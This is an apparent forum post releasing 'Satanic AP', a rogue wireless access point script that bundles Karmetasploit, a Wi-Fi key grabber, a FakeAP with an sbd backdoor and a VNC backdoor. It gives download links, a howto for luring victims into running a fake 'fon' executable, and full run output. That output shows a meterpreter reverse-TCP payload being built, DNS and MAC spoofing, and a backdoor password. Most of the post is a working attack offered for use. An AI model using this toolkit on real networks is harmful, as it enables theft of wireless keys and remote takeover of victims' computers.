Hi everybody
The satanic AP is finished. Like the name already says, it’s an evil wireless access point. It combines Karmetasploit, Wireless Key Viewer (wkg) by hm2075, FakeAP with sbd by g0tmilk and VNC backdooring in one script (everything is done with meterpreter…).
Some important things:
- The hole script works for my IBM T43p/atheros wireless card/BT4 pre final as attacker
- The victim is Windows Vista on a Lenovo T400 with Antivir
- The WLan AP is horribly slow. Maybe it’s the mtu size, maybe not.
- There are a lot of variables which are exported at the beginning of the script, but you can change nearly everything to your needs
- You don’t need to download the programms/exes i use, you can compile/download them yourself if you don’t trust my executables:
— wkv.exe – Wireless Key View by nirsoft (maybe i modified some bits in my version), Password Recovery Tools for Windows
— sbd.exe is already on BT. I don’t use another one.
— vncbackdoor.exe -> follow pureh@tes tutorial on windows backdoor part 1 and Uploading a windows vnc backdoor part 2 , the new version of ultraVNC changed, you don’t have to do the registry stuff but pack the .ini file into the exe and run winvnc.exe -run instead of -reinstall. But that’s another story.
— fDNS is available on DNSpenTest | Get DNSpenTest at SourceForge.net
- SatanicAP can be run in five different modes:
— 0 = Karmetasploit
— 1 = Wireless Key Grabber by hm2075
— 2 = FakeAP by g0tmilk – You have to shut down your Antivirus on Windows Victim!
— 3 = Wireless Key Grabber (1) and FakeAP (2) together – Shut down Antivirus!
— 4 = UltraVNC Backdoor instead of SBD – Shut down Antivirus (and allow VNC on Win Firewall)!
— 5 = Wireless Key Grabber (1) and VNC Backdoor (4) – Shut down Antivirus (and allow VNC on Win Firewall)!
- I only implemented VNC to proof that it’s very easy to extend the script. It took about 10 lines of code
- I commented out the autometer script because i was too lazy to fix it
Here’s the script only: Uploadingit.com | Downloading File: satanicAP.sh
Here’s the script including programs/exes: Uploadingit.com | Downloading File: satanicAP.tar.gz
Here’s the howto (as short/simple as possible):
1. backup dhcpd.conf
Code:
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak
2. Change into /root/ folder
3. Download Uploadingit.com | Downloading File: satanicAP.tar.gz and extract it into /root/
Code:
cd /root/
tar -zxf satanicAP.tar.gz
cd ./SAP
4. Read satanicAP.sh script to understand what it does!
5. Go through the export statements at the beginning of the script and change them to your needs. Leave everything you don’t understand 
6. Make executable
Code:
chmod +x satanicAP.sh
7. Run it the first time and read its output
8. Start Karmetasploit and read its output
9. Connect with a Windows Machine to the AP and open up a browser (mine was not vulnerable)
10. Back in Backtrack you can test other combinations:
11. Disconnect and Reconnect again with the Windows Machine, open up a browser and go to Google or www.uezdfedjw.net, download the mentioned exe file from the “fon” page and execute it. On the Backtrack machine you will see Metasploit starting the “Sending Stage”. It takes about 1 minute in my lab. With vnc it takes much longer, because the vncbackdoor.exe is bigger.
12. Here is the output of the script after a successfull execution (example for ./satanicAP 5 0):
Code:
root@floyd:~/SAP# ./satanicAP.sh 5 0
[+] Satanic AP by floyd fuh
[+] Cleaning up befor I begin
Site Satanic_AP disabled.
Run '/etc/init.d/apache2 reload' to activate new configuration!
Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:09:56 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
... waiting .
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0] (removed)
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)
[+] Making dirs
mkdir: cannot create directory `/root/SAP': File exists
mkdir: cannot create directory `/root/SAP/www': File exists
mkdir: cannot create directory `/root/SAP/payload': File exists
mkdir: cannot create directory `/root/SAP/tools': File exists
mkdir: cannot create directory `/root/SAP/tools/dns_spoof': File exists
[+] Killing wicd
Stopping Network connection manager: wicd.
wicd-client: no process killed
[+] Starting Monitor Mode
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
8117 dhclient
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)
[+] Changing MAC of mon0 to 00:10:23:A2:F2:83
Current MAC: 00:1X:aX:3X:X5:X1 (unknown)
Faked MAC: 00:10:23:a2:f2:83 (Flowwise Networks, Inc.)
[+] Writing /etc/dhcp3/dhcpd.conf
[+] Setting up AP
[+] Sleeping to wait for interface
[+] Starting apache
Starting web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:10:07 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
.
[+] Setting up VirtualHost config for Satanic AP
[+] Disabling Apache2 site default, enabling Satanic_AP
Site default already disabled
Enabling site Satanic_AP.
Run '/etc/init.d/apache2 reload' to activate new configuration!
[+] Reloading Apache2
Reloading web server config: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
.
[+] Compile payload fon_access_2.7.exe (reverse tcp shell)
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 272
Options: LHOST=10.0.0.1,LPORT=5555
[+] Writing proof file
[+] Writing common proof file script
[+] Writing FakeAP script
[+] Copying the second payload vncbackdoor.exe/sbd.exe to sys32.exe
[+] Writing Metasploit script
[+] Starting Metasploit
[+] Setting up interfaces and iptables
[+] Starting DHCP
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 13 leases to leases file.
Listening on LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
[+] Starting DNS Spoof
[+] You probably have to connect to 10.0.0.100::1050
[+] The password is satanicAPConnect
For further explanation watch pureh@tes http://blip.tv/file/577132
as well as http://uploads.blip.tv/file/577932 . The new version of UltaVNC uses
a .ini file instead of registry and you just have to winvnc.exe -run instead of
winvnc.exe -reinstall.
[+] Satanic AP over and out. floyd fuh
Thanks to bro Floyd from remote-exploit forum for this script
http://forums.remote-exploit.org/wireless/27147-satanicap-karmetasploit-wkg-fakeap-vncbackdoor-2.html
